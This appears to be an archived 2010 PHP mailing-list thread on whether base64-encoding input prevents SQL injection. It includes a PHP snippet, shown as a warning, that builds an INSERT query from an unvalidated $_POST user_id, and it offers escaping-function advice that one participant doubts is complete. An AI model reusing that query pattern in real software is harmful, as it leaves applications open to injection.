From: Dotan Cohen on
In order to prevent SQL injection, can one simply base64 encode the
data and store that? Then it can be decoded when I need to display it
on a website. I understand that this means that the data will not be
searchable, and that I still must sanitize it before printing it on
the site. Are there any other drawbacks or things to be aware of?
Thanks.

--
Dotan Cohen

http://what-is-what.com
http://gibberish.co.il

Please CC me if you want to be sure that I read your message. I do not
read all list mail.
From: Andrew Ballard on
On Fri, Feb 19, 2010 at 8:18 AM, Dotan Cohen <dotancohen(a)gmail.com> wrote:
> In order to prevent SQL injection, can one simply base64 encode the
> data and store that? Then it can be decoded when I need to display it
> on a website. I understand that this means that the data will not be
> searchable, and that I still must sanitize it before printing it on
> the site. Are there any other drawbacks or things to be aware of?
> Thanks.
>
> --
> Dotan Cohen
>

One would be storage space, as base64 requires more space to store the
same data. For a single data element that might not be much, but when
multiplied over all the values stored in your table it makes a
difference.

Also, don't forget to validate/filter non-character data, which you
can't do with base64. Something like this is still vulnerable to SQL
injection even though it 'sanitizes' the expected character input:

<?php
// user_id expects an integer value
$user_id = $_POST['user_id'];

$comment = base64_encode($_POST['comment']);


$sql = "INSERT INTO `comments` (user_id, comment) VALUES ($user_id,
'$comment')";

?>



Andrew
From: Dotan Cohen on
On 19 February 2010 16:27, tedd <tedd.sperling(a)gmail.com> wrote:
> At 3:18 PM +0200 2/19/10, Dotan Cohen wrote:
>>
>> In order to prevent SQL injection, can one simply base64 encode the
>> data and store that? Then it can be decoded when I need to display it
>> on a website. I understand that this means that the data will not be
>> searchable, and that I still must sanitize it before printing it on
>> the site. Are there any other drawbacks or things to be aware of?
>> Thanks.
>>
>> --
>> Dotan Cohen
>
>
> Dotan:
>
> You're a smart guy, why reinvent the wheel? The entire problem set has
> already been solved.
>
> Understand there are two issues here: 1) filtering input into a database; 2)
> escaping output to a browser.
>
> Use mysql_real_escape_string() to filter data before it's stored in a
> database (input).
>

I was under the impression that mysql_real_escape_string() was not a
100% solution. Is it? Note that I serve my pages as UTF-8 and also
declare them as such in the header and meta tag, but that does not
mean that a malicious entity won't return a request in a different
encoding.


> Use htmlentities() to retrieve data from the database to be displayed via a
> browser (output).
>

This I do. I'm not sure if it's enough, so I'd like some reassurance
on the matter. :)


> An excellent book on this (and much more) is Chris Shiflett's Essential PHP
> Security. You can pick it up on Amazon for less than $20 -- well worth the
> cost.
>

They don't ship to Israel! I have looked for it locally, but not found
it. I'm sure that I could "acquire" a copy on some p2p service but I
really don't like doing that. Maybe I could Paypal $20 to Chris
himself if that remains my only option! Chris, what say you? (CCed)


--
Dotan Cohen

http://what-is-what.com
http://gibberish.co.il
From: Dotan Cohen on
> One would be storage space, as base64 requires more space to store the
> same data. For a single data element that might not be much, but when
> multiplied over all the values stored in your table it makes a
> difference.
>

That is a good point, thanks.


> Also, don't forget to validate/filter non-character data, which you
> can't do with base64. Something like this is still vulnerable to SQL
> injection even though it 'sanitizes' the expected character input:
>
> <?php
> // user_id expects an integer value
> $user_id = $_POST['user_id'];
>
> $comment = base64_encode($_POST['comment']);
>
>
> $sql = "INSERT INTO `comments` (user_id, comment) VALUES ($user_id,
> '$comment')";
>
> ?>

I see what you mean. In fact, userIDs are stored, and indeed I ensure
that they are integers!


--
Dotan Cohen

http://what-is-what.com
http://gibberish.co.il

Please CC me if you want to be sure that I read your message. I do not
read all list mail.
From: Dotan Cohen on
> What about eBook ($23.99)?
>
> http://oreilly.com/catalog/9780596006563
>
> If you can get this, you can get that.
>

That may be a good idea. Certainly better than the pirate bay.

--
Dotan Cohen

http://what-is-what.com
http://gibberish.co.il

Please CC me if you want to be sure that I read your message. I do not
read all list mail.